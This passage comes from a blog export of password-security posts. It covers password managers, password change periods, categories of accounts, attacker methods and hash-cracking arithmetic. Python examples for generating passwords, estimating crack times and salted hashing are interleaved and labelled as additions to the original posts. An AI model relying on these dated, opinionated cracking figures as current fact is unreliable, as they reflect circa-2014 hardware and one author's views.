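    return "".join(secrets.choice(DIGITS) for _ in range(length))


def entropy_bits(length: int, alphabet_size: int = len(ALPHABET)) -> float:
    """Entropy of a uniformly random string of this length over this alphabet."""
    return length * math.log2(alphabet_size)


if __name__ == "__main__":
    for level, length in LENGTH_BY_LEVEL.items():
        print(f"{level:9s} {generate_password(level)}  ({entropy_bits(length):.1f} bits)")
    print("pin      ", generate_pin(6))
    print("Password12 has", character_classes("Password12"), "of 4 classes")
```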
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Password history</b></div>
<div style="text-align: justify;">
Never-ever reuse passwords. NEVER!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Password change period</b></div>
<div style="text-align: justify;">
If it is not enforced otherwise, don't bother changing it even twice a year. But! Check whether password cracking speed has made your current ones obsolete. If yes, change the obsolete passwords. Immediately change the password if you have been notified that the service you use has been compromised. Immediately change all of your recently used passwords if you suspect malware was running on your computer (do this on a known clean computer). Immediately change your password if you have used it on a computer you don't own, or if there is a small chance malware is running on it. Change it if you really had to give your password to someone. Otherwise, goodbye regular password change. We will miss you...</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
If you are a CISO writing security policies, you should base the password change period on: do you allow LM hashes? What is the password length requirement for users and administrators? What is the current hash cracking speed, and the forecast for the next 2 years? I think people would be happy to lengthen their passwords by 1-2 characters if they are not forced to change them frequently (e.g. every month).<br />
<span style="font-size: small;"><span style="font-weight: normal;">Now that I was sooo smart, giving advice people still hate to implement, let's see the practical implementations. At least some people might like me, because I told them not to change their passwords regularly. Next time someone tells you to change all your important passwords regularly, put a lie detector on him and check whether he changes all of his passwords regularly. If he lies, feel free to use the <a href="http://xkcd.com/538/" target="_blank">wrench algorithm</a> to crack his passwords. If he was not lying, call 911 to put a straitjacket on him.</span></span><span style="font-size: small; font-weight: normal;"> Only insane paranoid people do that in reality. Others are just too scared to say "what everyone recommended so far is bullshit". Comments are welcome ;) Other people might hate me for telling them to use true random passwords. Don't panic, keep reading.</span></div>
<div style="text-align: justify;">
And don't forget to use 2 factor authentication. It might seem a bit of an overkill at the beginning, but after months, you won't notice using it.</div>
<br />
<h2>
(Bad and good) solutions</h2>
<div>
<h3>
I will use the same password everywhere</h3>
<div>
This is a pretty bad idea. If one of the passwords is compromised, either the attackers can access your other sites, or you have to change all of your passwords. There are better ways to spend your life on earth than changing all of your passwords.<br />
<br />
<h3>
I will remember it</h3>
<div>
Good luck remembering 250 different, complex passwords. Don't forget to change them regularly! ;)</div>
<br />
<h3>
I will use the password recovery all the time</h3>
<div>
Not a very user-friendly solution. And because the security answer has to be as complicated as the password itself, the problem has not been solved.</div>
<br />
<h3>
I will write it down into my super-secret notebook and put it in my drawer</h3>
<div>
Although it might work in some cases, it won't work in others. I don't recommend it.<br />
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAZvfTX1NLWBJxTA8Qb1FdLvPtHIIpPQYuEabqB6EGqcxmOL5UMu18jw5bjz5N1aobcmWR7oe5Ca3FyvrBcy0rLUzr9Zln60OfhE0GKAAZF7C1wjgETwjTb-AXBaiZYvfCEiCOT1sZmseo/s1600/interior.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAZvfTX1NLWBJxTA8Qb1FdLvPtHIIpPQYuEabqB6EGqcxmOL5UMu18jw5bjz5N1aobcmWR7oe5Ca3FyvrBcy0rLUzr9Zln60OfhE0GKAAZF7C1wjgETwjTb-AXBaiZYvfCEiCOT1sZmseo/s1600/interior.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiFH6sRmc8JqmBlVJ0j26c27hN3cSNmS_JJEJXSN8DOc9yDx-wLMqlE7R68hufbTKxW9LoaL0f2vaD8YfAmukEnSJZgbGHZfeCyFBE0QItjAQJ4o2B7wzAEmPCXxYWytUjJdfOSEZTNF_D/s1600/monitor.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="214" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiFH6sRmc8JqmBlVJ0j26c27hN3cSNmS_JJEJXSN8DOc9yDx-wLMqlE7R68hufbTKxW9LoaL0f2vaD8YfAmukEnSJZgbGHZfeCyFBE0QItjAQJ4o2B7wzAEmPCXxYWytUjJdfOSEZTNF_D/s1600/monitor.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
<br /></div>
<h3 style="text-align: justify;">
I will use an algorithm, like a base password, and add the websites first letters to the end of the password</h3>
<div style="text-align: justify;">
Still better than using the same password everywhere, but believe me, if this is a targeted attack, it is not that hard to guess your password generation algorithm.</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
I will use the advice from XKCD, and use the password correcthorsebatterystaple</h3>
<div style="text-align: justify;">
Still a lot better than simple passwords, but <a href="http://nakedsecurity.sophos.com/2012/03/19/multi-word-passphrases/" target="_blank">unfortunately, people are still bad at choosing random words with random order</a>, so it is not the best solution. And again, you can't memorize 250 different passwords ... Even 10 is impossible. Only use this method in special corner cases (see details later), and use a passphrase generator!</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
I will use a <u>password manager</u></h3>
</div>
</div>
<div style="text-align: justify;">
This is the very first good idea. It solves the problem of remembering 250 different complex and random passwords. Some people complain about using a password manager; here are those complaints, and my answers:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>If someone gets access to this one password store, all is lost.</u></div>
<div style="text-align: justify;">
<b>Answer</b>: If someone accessed your password store and the master password, you can be pretty damn sure that most of your passwords are already stolen. For extra paranoids, you can use multiple password stores, one for daily use, one for rare cases. Be careful not to forget the password for the second one ;)</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>What if I don't have access to the password store when I need it?</u></div>
<div style="text-align: justify;">
<b>Answer</b>: In the age of cheap notebooks, tablets, and smartphones, in 99% of the cases you should not use that important password on any other device than yours. In the rare cases when you must, you can use either your smartphone to get the password, or use a browser extension like <a href="https://chrome.google.com/webstore/detail/pawhash/adgekjfphhgngpdoklolpjenmgneobfg" target="_blank">Password hasher</a> to generate different passwords to different websites, with one password. For extra paranoids, you can have different master passwords for the different security levels. And don't forget to change the password after you are back at your own computer.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>What if I forgot the one password to the password store?</u></div>
<div style="text-align: justify;">
<b>Answer</b>: If you use your password manager daily, you are as likely to forget that one password as you are to forget every one of your passwords.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>Password managers make phishing attacks easier.</u></div>
<div style="text-align: justify;">
<b>Answer</b>: Who started this nonsense? Good password managers decrease the risk of phishing.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>Password managers have the same vulnerabilities as other websites or software.</u></div>
<div style="text-align: justify;">
<b>Answer</b>: Well, this is <a href="http://devd.me/papers/pwdmgr-usenix14.pdf" target="_blank">partially true</a>. There are at least 3 types of password managers, from most secure to least: offline, browser built-in, online. Online password managers give better user experience, with a sacrifice in security. But if you choose one of the leading password managers, and you are a simple home user, the risks are negligible. If you try to store your work password in an online password store, you might violate your internal security policy. For paranoids, use offline password managers, and back them up regularly. If you choose an online password manager, at least use 2-factor authentication. And don't forget, your Chrome password can be easily synchronized to the cloud, shifting it to the online category.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>In some cases, like Full Disk Encryption, OS login, smartphone login, or password manager login, the auto-type of password from the password manager is not available, thus choosing a true random password is a pain in the a$$.</u></div>
<div style="text-align: justify;">
<b>Answer</b>: True. Generate pronounceable passwords or passphrases in these corner cases; e.g. with the Linux tool apg you can generate pronounceable passwords. For easy and fast typing, don't use capital letters (only lower-alpha, digit, special) in the original password, but increase the length of the password. Add 1 extra character because you don't use upper case letters, add 3 more because it is a pronounceable password, and you are good to go. For extra paranoids, change one or two of the letters to uppercase where it is convenient. </div>
<div style="text-align: justify;">
apg -M SNL -m 15 is your friend.</div>
<div style="text-align: justify;">
If you want to check what I write here (always a good idea), test the entropy of a truly random 10 character password with all character classes, and compare it with 14 characters without uppercase. I recommend KeePass for that. If you comment on this that "KeePass can not measure that it is a pronounceable password, thus the entropy is lower in reality", my answer is: "Check out the current passwords used by users and the current password advice, and tell me if this password is a lot better or not ..." . You have been warned.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsHSeFfNJqZ9hiiluvbs3u6MrllZoqzREjsKZRIJEj86RPdop-SK6G8nVCAv-RaGWk0rKeu4VgqIrhQORAnSo3Rdkfkw3DlBsKOBn0Z3BMgbM1AvEN4WGx4QfK5JY9YbmhyphenhyphenjPdqeL2wQKE/s1600/pronouncable.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="61" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsHSeFfNJqZ9hiiluvbs3u6MrllZoqzREjsKZRIJEj86RPdop-SK6G8nVCAv-RaGWk0rKeu4VgqIrhQORAnSo3Rdkfkw3DlBsKOBn0Z3BMgbM1AvEN4WGx4QfK5JY9YbmhyphenhyphenjPdqeL2wQKE/s1600/pronouncable.png" width="320" /></a></div>
<br />
For the high-level password class, I don't recommend anything your brain generated. There are also suitable <a href="http://pwgen-win.sourceforge.net/" target="_blank">offline passphrase generators</a>. Use at least 5-6 words for passphrases.<br />
<br />
<div style="text-align: justify;">
<u>Password managers are not user-friendly, it takes more time to log in.</u></div>
<div style="text-align: justify;">
<b>Answer</b>: If you set auto-type/auto-fill, and the password manager is opened once a day (and you lock your computer when you leave it), in this case, logging in takes less time than typing it! It is more convenient to use it, rather than typing the passwords every time.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>I like to create new unique passwords every time I create a new account, and password managers take the fun away from it.</u></div>
<div style="text-align: justify;">
<b>Answer</b>: <a href="http://janrain.com/about/newsroom/press-releases/online-americans-fatigued-by-password-overload-janrain-study-finds/" target="_blank">Said no one, ever!</a> "38 percent of people think it sounds more appealing to tackle household chores – from folding the laundry to scrubbing toilets – than to try and come up with another new user name or password."</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
To summarize: use a password manager.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<h2>
General advice</h2>
</div>
<div style="text-align: justify;">
Never use your essential passwords on other computers. They might be infected with a password stealer. If you really have to use it, change the password as soon as possible on a trusted (your) computer.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Don't let phishing sites fool you. If you go to the local flea market, and there is a strange looking guy with a "Superbank deposit here" logo above his head, would you hand over your money?</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Protect yourself against malware. Use a recent operating system, and even if you use OSX or Linux, it is not a bad thing to have an AV as a "last line of defense". Or to check your pendrive for Windows USB worms.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Never-ever use online web sites to "generate your password", "measure the complexity of your password" or "check if it has been breached". Never! (Except if it is your password manager :) ... )<br />
<br />
Update: Sign up on the https://haveibeenpwned.com/ for notification if your e-mail is found in a leak.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Changing passwords frequently is bad advice. It is not effective. Put more energy into the other, correct password advice. </div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com1tag:blogger.com,1999:blog-7429675726481888518.post-41446815509726705102014-10-01T09:17:00.000+02:002019-10-08T15:49:47.710+02:00Change passwords regularly - a myth and a lie, don't be fooled, part 1 <br />
TL;DR: different passwords have different protection requirements, and different attackers using various attacks can only be prevented through different prevention methods. Password security is not simple. For real advice, check the second post (in progress).<br />
<br />
Are you sick of password advice like "change your password regularly" or "if your password is password, change it to pa$$w0rd"? This post is for you!<br />
<br />
The news sites are full of password advice nowadays due to recent breaches. When I read/watch <a href="https://www.youtube.com/watch?v=qz5i171h_no" target="_blank">this advice (especially on CNN</a>), I am usually pissed off for a lot of reasons. Some advice is terrible (<a href="https://xato.net/passwords/the-worst-password-tips/" target="_blank">a good collection is here</a>), some is good but without solutions, and other advice is better, but doesn't explain the reasons. Following is my analysis of the problem. It works for me. It might not work for you. Comments are welcome!<br />
<br />
<h2>
Password history</h2>
Passwords have been used since <a href="http://en.wikipedia.org/wiki/Password#History_of_passwords" target="_blank">ancient times</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLnRGYcODIkITg4AhVhUg3hnom8PrJ5NzoJPLXCa7Q8Phh4ndSCguvWFPlT0uFAEyj77hp8gfrTXq1Zpts-TrbfyB1bMrSEH-A3-SUBjMRpabINXMOlRsXKLi-EOJUJRTJHfc7ek4CFEqg/s1600/15f1ae857ca97193ffff8102ffffd524.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLnRGYcODIkITg4AhVhUg3hnom8PrJ5NzoJPLXCa7Q8Phh4ndSCguvWFPlT0uFAEyj77hp8gfrTXq1Zpts-TrbfyB1bMrSEH-A3-SUBjMRpabINXMOlRsXKLi-EOJUJRTJHfc7ek4CFEqg/s1600/15f1ae857ca97193ffff8102ffffd524.jpg" width="320" /></a></div>
<br />
Because it is simple. When I started using <a href="http://seriesandtv.com/wp-content/uploads/2013/06/the-internet.png" target="_blank">the Internet</a>, I believe I had three passwords. Windows login, webmail, and IRC. Now I have ~250 accounts/passwords to different things, like to my smartphone, to my cable company (this password can be used to change the channels on the TV), to my online secure cloud storage, to full disk encryption to start my computer, <strike>to my nude pictures</strike>, to my WiFi router, to my cloud server hosting provider, etc etc etc. My money is protected with passwords, my communication is protected with passwords/encryption, my work is protected with passwords. It is pretty damn important. And yet people tend to choose lame passwords. Pretty lame ones. Because they don't think it can be significant. But what is not essential today will be relevant tomorrow. The service you used to download music (iTunes) with the lame password will one day protect all your Apple devices, where attackers can download your backup files, <a href="http://www.wired.com/2012/08/apple-amazon-mat-honan-hacking/all/" target="_blank">erase all your devices</a>, etc. <a href="http://lukenotricks.blogspot.nl/2010/03/8-characters-long-and-include-at-least.html" target="_blank">The seven-character and one capital rule is not enough anymore.</a> This advice is like "PDF is safe to open" or "Java is secure". Old, outdated, untrue.<br />
<br />
Now, after this lengthy prologue, we will deep dive into the analysis of the problem, by checking what we want to protect, against whom (who is the attacker), and only after that, we can analyze the solutions. Travel with me, I promise it will be fun! ;)<br />
<br />
<h2>
What to protect?</h2>
<div>
There are different services online, and different services need different kinds of protection. You don't use the same lock on your <a href="https://www.youtube.com/watch?v=EJOIjQJAL30" target="_blank">Trabant</a> as you do on your <a href="https://www.youtube.com/watch?v=j82VKi8NNsM" target="_blank">BMW</a>.<br />
<br /></div>
<div>
<h3>
Internet banking, online money</h3>
<div>
For me, this is the most vital service to protect. Luckily, most of the internet banking services use two-factor authentication (2FA), but unfortunately, not all of them offer <a href="http://en.wikipedia.org/wiki/Transaction_verification" target="_blank">transaction authorization/verification</a> with complete transactions. 2FA is not effective against malware, it just complicates the attack. Transaction authorization/verification is better, but not perfect (see <a href="http://www.kaspersky.com/about/news/virus/2011/Teamwork_How_the_ZitMo_Trojan_Bypasses_Online_Banking_Security" target="_blank">Zitmo</a>). If the access is not protected with 2FA, better choose the best password you have (long, real random, sophisticated, but we will get to this later). If it is protected with 2FA, it is still no reason not to use the best password ;) This is what I call the "very high-level password" class.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMf5J_Rba7N06aET8grGd1LMbJYNu7BFyYQ9RE22-SapxIxBCA3fAGp74qwww9GD4ux8Rwmd7jntzFDQFJCNJvGuWWr9tp-5e5_sCOnUW3tGc8vbvlrGg_DMgkvtLIft5G8Hsn1-VWNPjO/s1600/one-does-not-simply_trust_paypal.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMf5J_Rba7N06aET8grGd1LMbJYNu7BFyYQ9RE22-SapxIxBCA3fAGp74qwww9GD4ux8Rwmd7jntzFDQFJCNJvGuWWr9tp-5e5_sCOnUW3tGc8vbvlrGg_DMgkvtLIft5G8Hsn1-VWNPjO/s1600/one-does-not-simply_trust_paypal.png" width="320" /></a></div>
<br /></div>
<h3>
Credit card data</h3>
</div>
<div>
This system is pretty <strike>fucked up</strike> bad. Something has to be secret (your credit card number), but in the meantime that is the only thing to identify your credit card. It is like your username is your password. Pretty bad idea, huh? The problem is even worse with a <a href="https://twitter.com/mikko/status/236355251966468096" target="_blank">lot of different transaction types</a>, especially when the hotel asks you to fax both sides of your CC to them. Unfortunately, you can't change the password on your credit card, as there is no such thing, but <a href="http://en.wikipedia.org/wiki/3-D_Secure" target="_blank">Verified by VISA or 3-D Secure</a> with 2FA might increase the chances your credit card won't get hacked. And on a side note, I have removed the CVV numbers from my credit/debit cards. I only read it once from the card when I received it, I don't need it anymore to be printed there.<br />
And sometimes, <a href="https://twitter.com/NeedADebitCard" target="_blank">you are your own worst enemy.</a> Don't do stupid things like this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0Fx3UkiEVLH-AJsWIotomaW4mXtez4HIkp22fx7nIqvmB3sfVC9IPZAxu9RmpAntFi39wb3gJ4tQuzHgvO85qo-L0_JvdpMlYCCmSimT_4NQYSycw362igx9MaHeeV3F2LBlsxQ1pJFPM/s1600/BgUWxYLCYAEkMQ6.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0Fx3UkiEVLH-AJsWIotomaW4mXtez4HIkp22fx7nIqvmB3sfVC9IPZAxu9RmpAntFi39wb3gJ4tQuzHgvO85qo-L0_JvdpMlYCCmSimT_4NQYSycw362igx9MaHeeV3F2LBlsxQ1pJFPM/s1600/BgUWxYLCYAEkMQ6.jpg" width="320" /></a></div>
<br /></div>
<h3>
Work related passwords (e.g. Windows domain)</h3>
<div>
This is very important, but because the attack methods are a bit different, I created this as a different category. Details later.<br />
<br /></div>
<h3>
Email, social sites (Gmail/Facebook/Twitter), cloud storage, online shopping</h3>
<div>
This is what I call the "high level password" class.</div>
<div>
Still, pretty important passwords. Some people don't understand "why would attackers put any energy into getting my Facebook account?" It is simple. For money. They can use your account to spread spam all over your Facebook wall. They can write messages to all of your connections and tell them you are in trouble and send money via Western Union or Bitcoin.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4ZZK7JYG0GWcgLl9yLhbwzwkzfkonO8HYS7PtSz0UaFU6nWh2hSnBtA79qWv-Sb6DGjLKyBR951VU_VjJ4nVktJaG2agXNpfgV_WSDMwj7fQpPhadOTQlfhM5mBmoZSGz5cW4b1sueAcU/s1600/facebook-scam-travel1.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4ZZK7JYG0GWcgLl9yLhbwzwkzfkonO8HYS7PtSz0UaFU6nWh2hSnBtA79qWv-Sb6DGjLKyBR951VU_VjJ4nVktJaG2agXNpfgV_WSDMwj7fQpPhadOTQlfhM5mBmoZSGz5cW4b1sueAcU/s1600/facebook-scam-travel1.jpg" /></a></div>
<br />
They can use your account in Facebook votes. Your e-mail and cloud storage are again very important. 20 years ago you also had letters you didn't want to print and put in front of the nearest store, and you don't want to do that with your private photo album either. On a side note, it is best to use a cloud storage where even the <a href="https://tresorit.com/" target="_blank">cloud provider admin can't access your data.</a> But in this case, with no password recovery option, better think about "alternative" password recovery mechanisms.<br />
<br /></div>
<h3>
Other important stuff with personal data (e.g. your name, home address)</h3>
<div>
The "medium level password" class. This is a personal preference to have this class or not, but in the long run, I believe it is not a waste of energy to protect these accounts. These sites include your favorite pizza delivery service, your local PC store, etc.<br />
<br /></div>
<h3>
Not important stuff</h3>
This is the category "other". I usually use <a href="https://www.google.com/?q=one+time+disposable+email+service#q=one+time+disposable+email+service" target="_blank">one-time disposable e-mail</a> for these services: use it for the registration, get what I want, drop the e-mail account. Because I don't want to spread my e-mail address all over the internet whenever one of these sites gets hacked. But still, I prefer to use different, random passwords on these sites, although this is the "low level password" class.<br />
<h2>
Attackers and attack methods</h2>
After categorizing the different passwords to be protected, let's look at the different attackers and attack methods. They can, will, or are actively doing the following right now:<br />
<br />
<h3>
Attacking the clear text password </h3>
This is the most effective way of getting the password. Bad news is that if there is no other factor of protection, the victim is definitely not on the winning side. The different attack methods are:<br />
<br />
<ul>
<li>phishing sites/applications,</li>
</ul>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgajtXlB6146Lij8F8CpEHeGlDyS1Q9xGQODSgDiv7ynJigG0yq5xG8KeVWTt8cQ6EUkXH6NMeFmrF2CSvTQ9L4KaFLl8-bb2g6Dy58E99YmQsSTIcSuztR4uadwPrHHP2HoyJ9lUJhi57n/s1600/World-of-Tanks-Hack-5.0.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="330" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgajtXlB6146Lij8F8CpEHeGlDyS1Q9xGQODSgDiv7ynJigG0yq5xG8KeVWTt8cQ6EUkXH6NMeFmrF2CSvTQ9L4KaFLl8-bb2g6Dy58E99YmQsSTIcSuztR4uadwPrHHP2HoyJ9lUJhi57n/s1600/World-of-Tanks-Hack-5.0.jpg" width="400" /></a></div>
<div>
<br /></div>
<ul>
<li><a href="http://beta.gadgetzz.com/2011/08/15/this-is-the-best-ever-how-a-13-year-old-tried-to-hack-a-steam-account-and-got-hacked/" target="_blank">social engineering,</a></li>
<li>malware running on the computer (or <a href="http://www.computerworld.com/article/2492866/desktop-apps/researcher-to-demonstrate-feature-rich-malware-that-works-as-a-browser-extension.html" target="_blank">in the browser</a>), </li>
<li><a href="https://www.youtube.com/watch?v=t9BxB3dO0KQ" target="_blank">shoulder surfing</a> (watch out for smartphones and hidden cameras), </li>
<li>sniffing clear-text passwords when the website is not protected with SSL,</li>
<li><a href="http://www.hacking-tutorial.com/hacking-tutorial/break-ssl-protection-using-sslstrip-and-backtrack-5/" target="_blank">SSL MiTM</a>,</li>
<li>rogue website administrator/hacker logging clear text passwords,</li>
<li>password reuse - if the attacker can get your password in any way, and you reuse it somewhere else, that is a problem,</li>
<li>you told your password to someone and he/she will misuse it later,</li>
<li><a href="http://www.keyghost.com/USB-Keylogger.htm" target="_blank">hardware keyloggers,</a></li>
<li>etc.</li>
</ul>
<br />
The key thing here is that no matter how long your password is, no matter how complex it is, no matter how often you change it (except when you do this every minute ... ), if it is stolen, you are screwed. 2FA might save you, or might not.<br />
<br />
<h3>
Attacking the encrypted password </h3>
This is the usual "hack the webserver (via SQL injection), dump the passwords (with SQLMap), post hashes on pastebin, everybody <a href="http://www.networkworld.com/article/2172637/lan-wan/nvidia-exploit-could-turn-render-farms-into-password-crackers--bitcoin-miners--researchers-c.html" target="_blank">starts the GPU farm</a> to crack the hashes" scenario. This is basically the only scenario where password policies make sense. In this case the different levels of passwords need different protection levels. In some cases, this attack turns out to be the same as the previous attack, when the passwords are not hashed, or are just encoded.<br />
<br />
The current hash cracking speeds for hashes without any iterations (this is unfortunately very common) renders passwords like Q@tCB3nx (8 character, upper-lowercase, digit, special characters) useless, as those can be cracked in hours. Don't believe me? Let's do the math.<br />
<br />
Let's say your password is truly random, and randomly chosen from the 26 upper, 26 lower, 10 digit, 33 special characters. (Once I tried special passwords with high ANSI characters inside. It is a terrible idea. Believe me.). There are 6 634 204 312 890 620 different, 8 character passwords from these characters. Assuming a <a href="http://passwords12.at.ifi.uio.no/Jeremi_Gosney_Password_Cracking_HPC_Passwords12.pdf" target="_blank">2 years-old password cracking rig</a>, and MD5 hash cracking with 180 G/s speed, it takes a worst case 10 hours (average 5) to crack the password, <strike>including upgrading your bash to the latest, but still vulnerable bash version.</strike> Had the password been 10 characters long, it would take 10 years to crack with today's hardware. But if the password is not truly random, <a href="http://arstechnica.com/security/2013/05/how-crackers-make-minced-meat-out-of-your-passwords/" target="_blank">it can be cracked a lot sooner</a>. <br />
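The arithmetic above, together with the entropy comparison recommended in the password manager post earlier on this page (a 10-character password over all classes versus 14 characters without uppercase), worked through in Python. This is an added example, not code from the original post: the 95-character alphabet, the 180 G/s MD5 rate and the 365-day year are the post's own figures, 95 ** 8 is computed exactly, the LM two-halves split is the well-known LM design, and the <code>iterations</code> parameter is my addition to show how a deliberately slow hash changes the same numbers.

```python
import math

# Character classes as the post counts them: 26 upper, 26 lower, 10 digits, 33 specials.
UPPER, LOWER, DIGITS, SPECIAL = 26, 26, 10, 33
ALL_CLASSES = UPPER + LOWER + DIGITS + SPECIAL   # 95 printable ASCII characters
NO_UPPER = LOWER + DIGITS + SPECIAL              # 69: what "apg -M SNL" draws from

# The post's cracking rate: unsalted MD5 on a two-year-old GPU rig, 180 G hashes/s.
MD5_RATE_PER_SEC = 180e9
SECONDS_PER_HOUR = 3600
SECONDS_PER_YEAR = 365 * 24 * SECONDS_PER_HOUR


def keyspace(alphabet_size: int, length: int) -> int:
    """Distinct passwords of exactly `length` symbols drawn uniformly from `alphabet_size`."""
    return alphabet_size ** length


def entropy_bits(alphabet_size: int, length: int) -> float:
    """Entropy of a uniformly random password in bits (what a KeePass-style meter approximates).
    Only valid for truly random choice; a pronounceable or human-chosen password has less."""
    return length * math.log2(alphabet_size)


def worst_case_seconds(alphabet_size: int, length: int,
                       rate_per_sec: float = MD5_RATE_PER_SEC, iterations: int = 1) -> float:
    """Seconds to try every candidate; on average the password falls at half of this.
    `iterations` is my addition: a hash that runs its primitive N times divides the
    attacker's guessing rate by N."""
    return keyspace(alphabet_size, length) / (rate_per_sec / iterations)


def crack_hours(alphabet_size: int, length: int,
                rate_per_sec: float = MD5_RATE_PER_SEC, iterations: int = 1) -> float:
    return worst_case_seconds(alphabet_size, length, rate_per_sec, iterations) / SECONDS_PER_HOUR


def crack_years(alphabet_size: int, length: int,
                rate_per_sec: float = MD5_RATE_PER_SEC, iterations: int = 1) -> float:
    return worst_case_seconds(alphabet_size, length, rate_per_sec, iterations) / SECONDS_PER_YEAR


def lm_effective_keyspace() -> int:
    """LM (old Windows) uppercases the password and hashes two independent 7-character halves,
    so an attacker searches 2 * 69**7 candidates instead of 95**14 for a 14-character password."""
    return 2 * keyspace(NO_UPPER, 7)


if __name__ == "__main__":
    print(f"95^8 keyspace: {keyspace(ALL_CLASSES, 8):,}")
    print(f"8 chars, all classes, MD5 @ 180 G/s: {crack_hours(ALL_CLASSES, 8):.1f} h worst case")
    print(f"10 chars, all classes: {crack_years(ALL_CLASSES, 10):.1f} years worst case")
    print(f"10 chars all classes: {entropy_bits(ALL_CLASSES, 10):.1f} bits; "
          f"14 chars no uppercase: {entropy_bits(NO_UPPER, 14):.1f} bits")
    print(f"8 chars, all classes, 100k-iteration hash: "
          f"{crack_years(ALL_CLASSES, 8, iterations=100_000):.0f} years worst case")
    print(f"LM 14-char effective keyspace: {lm_effective_keyspace():,} "
          f"vs 95^14 = {keyspace(ALL_CLASSES, 14):,}")
```

Running it reproduces the post's figures: roughly 10 hours worst case for 8 characters, roughly 10 years for 10, and the 14-character no-uppercase password comes out ahead of the 10-character all-classes one by about 20 bits.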
<br />
A lot of common hashing algorithms don't use protections against offline brute-force attacks. This includes LM (old Windows hashes), NTLM (modern Windows hashes), MD-5, SHA1-2-512. These hashing algorithms were not developed for password hashing. They don't have salting, iterations, etc. out of the box. In the case of LM, the problem is even worse, as it converts the lowercase characters to uppercase ones, thus radically decreasing the key space. Out of the box, these hashes are made for fast calculation, thus support fast brute-force.<br />
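To show what "salting, iterations, etc. out of the box" buys a defender, here is an added Python example (not from the original post) contrasting an unsalted MD5 store with a salted, iterated PBKDF2-HMAC-SHA256 store built from the standard library. The 600,000 iteration count is my assumed work factor, the <code>pbkdf2_sha256$...</code> record format is invented for the example, and the two constructed users sharing the post's Q@tCB3nx password are there to show why salting matters in a leaked dump.

```python
import hashlib
import hmac
import os

# Assumed work factor for PBKDF2-HMAC-SHA256 (not from the post); raise it as hardware gets faster.
PBKDF2_ITERATIONS = 600_000
SALT_BYTES = 16


def md5_unsalted(password: str) -> str:
    """The kind of store the post warns about: one fast, unsalted MD5 per password.
    Every user with the same password gets the same hash, so one cracked hash (or one
    precomputed table) opens all of them, and a GPU rig runs at its full rate."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def hash_password(password: str, salt: bytes = None, iterations: int = PBKDF2_ITERATIONS) -> str:
    """Salted, iterated hash. Record format (invented for this example):
    pbkdf2_sha256$<iterations>$<salt hex>$<derived key hex>
    A fresh random salt per user makes equal passwords hash differently and defeats
    precomputation; the iteration count divides the attacker's guessing rate."""
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iterations, salt_hex, dk_hex = stored.split("$")
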